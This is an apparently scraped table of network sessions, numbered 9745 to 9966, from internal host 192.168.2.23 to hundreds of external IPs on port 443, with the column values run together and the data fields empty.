                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9745192.168.2.235529495.230.146.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9746192.168.2.234737888.117.219.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9747192.168.2.234717884.9.184.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9748192.168.2.235608885.193.254.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9749192.168.2.234221497.32.242.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9750192.168.2.2335908182.104.25.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9751192.168.2.234129896.8.55.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9752192.168.2.2339610186.157.141.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9753192.168.2.2347884123.172.185.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9754192.168.2.2340988133.224.83.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9755192.168.2.2342120124.45.64.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9756192.168.2.234202279.81.171.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9757192.168.2.2351860173.24.168.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9758192.168.2.2344172132.220.251.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9759192.168.2.234556813.192.108.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9760192.168.2.2347898135.135.125.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9761192.168.2.2356170223.238.64.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9762192.168.2.2348858132.121.84.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9763192.168.2.2343840134.189.148.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9764192.168.2.235544286.213.222.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9765192.168.2.2337828113.61.170.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9766192.168.2.2348672135.156.123.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9767192.168.2.2352978192.147.170.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9768192.168.2.2354756160.30.232.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9769192.168.2.235292248.96.28.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9770192.168.2.2354914189.23.12.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9771192.168.2.2334026130.202.110.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9772192.168.2.234817820.248.185.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9773192.168.2.2333864179.223.195.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9774192.168.2.2351734216.9.110.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9775192.168.2.235423451.180.81.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9776192.168.2.235530878.178.171.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9777192.168.2.2345608206.149.4.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9778192.168.2.2355022106.137.36.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9779192.168.2.2345042144.210.198.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9780192.168.2.234160296.165.203.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9781192.168.2.235630018.149.210.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9782192.168.2.234971486.191.185.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9783192.168.2.2338644131.15.153.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9784192.168.2.2333020192.70.29.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9785192.168.2.234471423.31.54.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9786192.168.2.2342528202.233.111.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9787192.168.2.234781484.11.195.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9788192.168.2.235641031.85.168.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9789192.168.2.2337720194.79.49.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9790192.168.2.2340228192.13.253.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9791192.168.2.2334300182.208.0.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9792192.168.2.235222485.214.36.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9793192.168.2.234102417.79.194.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9794192.168.2.2344750129.98.216.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9795192.168.2.235953878.190.180.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9796192.168.2.2347452166.65.26.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9797192.168.2.233685467.192.65.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9798192.168.2.2355038143.236.118.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9799192.168.2.2343792131.154.9.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9800192.168.2.2344836157.106.205.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9801192.168.2.2354072192.214.8.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9802192.168.2.2358620104.212.149.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9803192.168.2.2336828221.142.161.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9804192.168.2.23606888.48.194.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9805192.168.2.233280617.107.71.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9806192.168.2.2355342132.54.60.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9807192.168.2.2360336195.167.184.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9808192.168.2.2356520135.143.7.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9809192.168.2.234004042.245.111.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9810192.168.2.2342360201.102.168.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9811192.168.2.23569882.101.143.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9812192.168.2.234291262.172.219.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9813192.168.2.234529650.42.104.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9814192.168.2.234815672.167.223.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9815192.168.2.2342870204.159.97.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9816192.168.2.2345224120.158.70.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9817192.168.2.2355316112.81.16.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9818192.168.2.234187249.74.35.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9819192.168.2.2340850190.76.46.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9820192.168.2.2339422183.199.214.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9821192.168.2.235891259.52.116.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9822192.168.2.2336628212.6.98.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9823192.168.2.234648280.138.126.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9824192.168.2.235557034.190.22.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9825192.168.2.235750638.139.68.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9826192.168.2.2357540183.57.9.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9827192.168.2.2354490130.79.235.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9828192.168.2.233640465.13.137.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9829192.168.2.234184654.178.20.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9830192.168.2.2347870171.181.209.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9831192.168.2.2358182191.176.198.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9832192.168.2.2353338131.21.242.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9833192.168.2.2352836121.163.121.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9834192.168.2.234337088.175.204.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9835192.168.2.2350278168.55.150.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9836192.168.2.235701880.94.22.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9837192.168.2.2346922108.142.216.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9838192.168.2.235224045.149.87.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9839192.168.2.234266696.251.43.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9840192.168.2.234367046.243.7.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9841192.168.2.235805892.205.26.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9842192.168.2.234421231.68.59.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9843192.168.2.2355576144.112.139.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9844192.168.2.2359720186.155.66.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9845192.168.2.2339480218.46.204.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9846192.168.2.2334338165.128.144.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9847192.168.2.2347398159.214.28.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9848192.168.2.235828696.105.151.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9849192.168.2.2342684125.86.144.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9850192.168.2.2341966135.166.229.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9851192.168.2.23562689.118.83.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9852192.168.2.235275086.150.238.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9853192.168.2.2349012133.24.176.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9854192.168.2.233330641.253.196.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9855192.168.2.2339744119.106.178.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9856192.168.2.2344960100.141.114.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9857192.168.2.2356542219.239.183.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9858192.168.2.2338862181.134.77.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9859192.168.2.2353306128.85.10.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9860192.168.2.235821084.158.233.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9861192.168.2.2347802107.17.36.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9862192.168.2.234544291.188.70.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9863192.168.2.2338850158.93.23.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9864192.168.2.2335094124.194.7.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9865192.168.2.2342844174.170.13.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9866192.168.2.234925683.120.86.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9867192.168.2.2337882149.216.101.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9868192.168.2.2356904148.116.243.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9869192.168.2.234979899.152.74.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9870192.168.2.2335162179.112.151.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9871192.168.2.2351580147.168.255.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9872192.168.2.233582295.142.181.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9873192.168.2.236007082.35.87.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9874192.168.2.2344924218.171.204.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9875192.168.2.234337220.59.157.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9876192.168.2.2354686198.151.64.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9877192.168.2.233671649.180.220.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9878192.168.2.235831496.178.205.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9879192.168.2.2340360170.109.52.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9880192.168.2.2340034204.105.154.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9881192.168.2.2356122221.94.116.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9882192.168.2.2335564105.110.56.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9883192.168.2.2348178221.48.114.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9884192.168.2.2351364170.17.192.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9885192.168.2.2353618170.132.17.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9886192.168.2.233685634.188.231.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9887192.168.2.2337046223.251.242.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9888192.168.2.235975254.24.117.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9889192.168.2.23506104.210.179.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9890192.168.2.2337640184.190.42.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9891192.168.2.2357502175.35.150.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9892192.168.2.2343622159.114.140.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9893192.168.2.2356326221.37.33.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9894192.168.2.234318285.45.4.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9895192.168.2.23600625.117.209.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9896192.168.2.235177494.85.97.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9897192.168.2.2338658172.183.39.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9898192.168.2.234326636.63.201.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9899192.168.2.2356624116.54.98.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9900192.168.2.2338380146.157.187.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9901192.168.2.234080013.219.112.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9902192.168.2.234657654.49.197.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9903192.168.2.2341848168.169.228.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9904192.168.2.235103299.89.3.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9905192.168.2.2350768208.198.165.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9906192.168.2.2349870166.73.202.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9907192.168.2.2346404170.163.0.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9908192.168.2.23591301.120.155.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9909192.168.2.2333490212.212.228.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9910192.168.2.2343092103.124.211.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9911192.168.2.235595685.78.72.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9912192.168.2.2340676137.68.132.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9913192.168.2.2345708129.43.4.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9914192.168.2.2350432175.242.241.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9915192.168.2.23551128.123.209.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9916192.168.2.234825450.30.254.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9917192.168.2.2333376210.185.31.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9918192.168.2.2350184112.243.183.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9919192.168.2.234040267.177.143.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9920192.168.2.2353250115.177.85.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9921192.168.2.233473857.120.227.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9922192.168.2.234535213.221.4.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9923192.168.2.2348386149.10.24.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9924192.168.2.2355638188.244.248.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9925192.168.2.2360394114.250.198.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9926192.168.2.2344640206.175.23.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9927192.168.2.233834874.225.174.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9928192.168.2.2344120163.254.14.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9929192.168.2.2345278131.0.62.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9930192.168.2.234908687.194.219.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9931192.168.2.234027088.250.75.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9932192.168.2.235916097.204.6.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9933192.168.2.2355724131.218.6.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9934192.168.2.2338016104.4.43.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9935192.168.2.2349582191.98.189.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9936192.168.2.2355728199.169.217.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9937192.168.2.2353030179.133.78.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9938192.168.2.2336326192.240.29.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9939192.168.2.235542438.88.78.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9940192.168.2.2352086216.61.0.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9941192.168.2.2333822113.199.71.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9942192.168.2.2333522211.133.78.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9943192.168.2.2347532159.238.171.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9944192.168.2.2352728193.220.111.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9945192.168.2.2356542112.226.219.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9946192.168.2.2334730137.32.77.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9947192.168.2.233746688.250.185.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9948192.168.2.2344724150.183.85.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9949192.168.2.2350412141.89.217.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9950192.168.2.235960296.215.64.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9951192.168.2.235861892.130.180.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9952192.168.2.23537089.212.107.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9953192.168.2.2358816162.138.12.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9954192.168.2.233489673.207.69.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9955192.168.2.2356596163.54.217.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9956192.168.2.2347764137.166.241.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9957192.168.2.2357760104.33.115.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9958192.168.2.234823062.52.134.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9959192.168.2.2341656161.18.56.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9960192.168.2.2340346165.121.189.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9961192.168.2.235599061.36.51.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9962192.168.2.2337352103.175.180.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9963192.168.2.2352524128.0.183.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9964192.168.2.234996234.220.81.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9965192.168.2.2354858180.148.96.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9966192.168.2.2351022201.93.218.88443
